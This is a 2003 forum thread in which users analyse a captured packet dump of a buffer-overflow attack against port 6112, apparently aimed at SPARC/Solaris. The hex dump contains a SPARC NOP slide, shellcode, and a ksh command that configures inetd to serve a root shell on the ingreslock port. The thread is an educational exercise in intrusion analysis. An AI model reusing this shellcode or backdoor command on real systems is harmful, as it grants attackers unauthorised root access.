bsdjunkie
May 26th, 2003, 22:11
Found this example on the web.. don't want to give URL away yet, since the guy has a very nice writeup detailing what's going on....

1) What is going on in the following 2 packets. What type of attack, etc..
2) What is the significance of the "@" symbols?
3) What architecture/OS was this targeted at?



14:46:04.378306 adsl-61-1-160.dab.bellsouth.net.3592 > 172.16.1.102.6112: P 1:1449(1448) ack 1 win 16060 <nop,nop,timestamp 463986683 4158792> (DF)
0x0000 4500 05dc a1ac 4000 3006 241c d03d 01a0 E.....@.0.$..=..
0x0010 ac10 0166 0e08 17e0 fee2 c115 5f66 192f ...f........_f./
0x0020 8018 3ebc e1e9 0000 0101 080a 1ba7 dffb ..>.............
0x0030 003f 7548 3030 3030 3030 3032 3034 3130 .?uH000000020410
0x0040 3365 3030 3031 2020 3420 0000 0031 3000 3e0001..4....10.
0x0050 801c 4011 801c 4011 1080 0101 801c 4011 .@...@.......@.
0x0060 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@.
0x0070 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@.
0x0080 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@.
0x0090 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@.
0x00a0 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@.
0x00b0 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@.
0x00c0 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@.
0x00d0 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@.
0x00e0 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@.
0x00f0 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@.



0x04d0 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@.
0x04e0 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@.
0x04f0 20bf ffff 20bf ffff 7fff ffff 9003 e034 ...............4
0x0500 9223 e020 a202 200c a402 2010 c02a 2008 .#...........*..
0x0510 c02a 200e d023 ffe0 e223 ffe4 e423 ffe8 .*...#...#...#..
0x0520 c023 ffec 8210 200b 91d0 2008 2f62 696e .#........../bin
0x0530 2f6b 7368 2020 2020 2d63 2020 6563 686f /ksh....-c..echo
0x0540 2022 696e 6772 6573 6c6f 636b 2073 7472 ."ingreslock.str
0x0550 6561 6d20 7463 7020 6e6f 7761 6974 2072 eam.tcp.nowait.r
0x0560 6f6f 7420 2f62 696e 2f73 6820 7368 202d oot./bin/sh.sh.-
0x0570 6922 3e2f 746d 702f 783b 2f75 7372 2f73 i">/tmp/x;/usr/s
0x0580 6269 6e2f 696e 6574 6420 2d73 202f 746d bin/inetd.-s./tm
0x0590 702f 783b 736c 6565 7020 3130 3b2f 6269 p/x;sleep.10;/bi
0x05a0 6e2f 726d 202d 6620 2f74 6d70 2f78 2041 n/rm.-f./tmp/x.A
0x05b0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x05c0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x05d0 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAA

soup4you2
May 27th, 2003, 13:44
1) What is going on in the following 2 packets. What type of attack, etc..
2) What is the significance of the "@" symbols?
3) What architecture/OS was this targeted at?


NOP instruction code for the SPARC architecture. It will only work on i386 machines though. You're basically putting padding inside the buffer and they're basically trying to execute:

./bin/ksh -c echo "ingreslock stream tcp nowait root /bin/sh sh - i"/tmp/x;/usr/sbin/inetd -s /tmp/x;sleep 10;/bin/rm -f /tmp/x

bsdjunkie
May 27th, 2003, 14:38
Soup has it mostly right, but looks like he didn't copy/paste an important part
:wink:
It will only work on i386 machines though.
The more familiar NOP slide being 0x90, however, will only work on i386 machines.

Here is the paper i grabbed it from.

http://www.securityfocus.com/infocus/1676

soup4you2
May 27th, 2003, 16:17
:) i was actually reading that article earlier...